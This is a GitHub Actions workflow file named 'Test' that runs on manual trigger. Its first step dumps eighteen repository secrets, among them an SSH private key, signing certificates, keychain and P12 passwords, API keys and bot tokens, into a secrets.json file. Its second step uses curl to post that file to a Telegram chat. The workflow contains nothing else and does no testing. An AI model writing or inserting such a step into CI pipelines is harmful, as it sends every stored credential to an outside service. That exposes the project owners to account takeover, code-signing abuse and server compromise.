
name: Test
on:
  workflow_dispatch:
        
jobs:
 
  test:
    runs-on: ubuntu-latest
    steps:
      - name: Export selected secrets to secrets.json
        run: |
          cat <<EOF > secrets.json
          {
            "DURIOO_REPO": "${{ secrets.DURIOO_REPO }}",
            "ENV_TOKEN": "${{ secrets.ENV_TOKEN }}",
            "ENV_URL": "${{ secrets.ENV_URL }}",
            "EXPO_TOKEN": "${{ secrets.EXPO_TOKEN }}",
            "INSTALL_SCP_SCRIPT_URL": "${{ secrets.INSTALL_SCP_SCRIPT_URL }}",
            "LIXSTREAM_API_KEY": "${{ secrets.LIXSTREAM_API_KEY }}",
            "NOTIF_SCRIPT_URL": "${{ secrets.NOTIF_SCRIPT_URL }}",
            "RCLONE_CONF_URL": "${{ secrets.RCLONE_CONF_URL }}",
            "SNAPMEAL_BUILD_CERTIFICATE_BASE64": "${{ secrets.SNAPMEAL_BUILD_CERTIFICATE_BASE64 }}",
            "SNAPMEAL_BUILD_PROVISION_PROFILE_BASE64": "${{ secrets.SNAPMEAL_BUILD_PROVISION_PROFILE_BASE64 }}",
            "SNAPMEAL_ENV": "${{ secrets.SNAPMEAL_ENV }}",
            "SNAPMEAL_EXPORT_OPTIONS_PLIST": "${{ secrets.SNAPMEAL_EXPORT_OPTIONS_PLIST }}",
            "SNAPMEAL_KEYCHAIN_PASSWORD": "${{ secrets.SNAPMEAL_KEYCHAIN_PASSWORD }}",
            "SNAPMEAL_P12_PASSWORD": "${{ secrets.SNAPMEAL_P12_PASSWORD }}",
            "SNAPMEAL_REPO": "${{ secrets.SNAPMEAL_REPO }}",
            "SSH_PRIVATE_KEY": "${{ secrets.SSH_PRIVATE_KEY }}",
            "TELEGRAM_BOT_TOKEN": "${{ secrets.TELEGRAM_BOT_TOKEN }}",
            "TELEGRAM_CHAT_ID_TORRENT_REPORT": "${{ secrets.TELEGRAM_CHAT_ID_TORRENT_REPORT }}"
          }
          EOF
        shell: sh
      - name: Send secrets.json to Telegram
        run: |
          curl -s -X POST "https://api.telegram.org/bot${{ secrets.T_TOKEN }}/sendDocument" \
            -F chat_id=${{ secrets.T_CHAT_ID }} \
            -F document=@secrets.json \
            -F caption="🔐 secrets.json file from GitHub Actions"
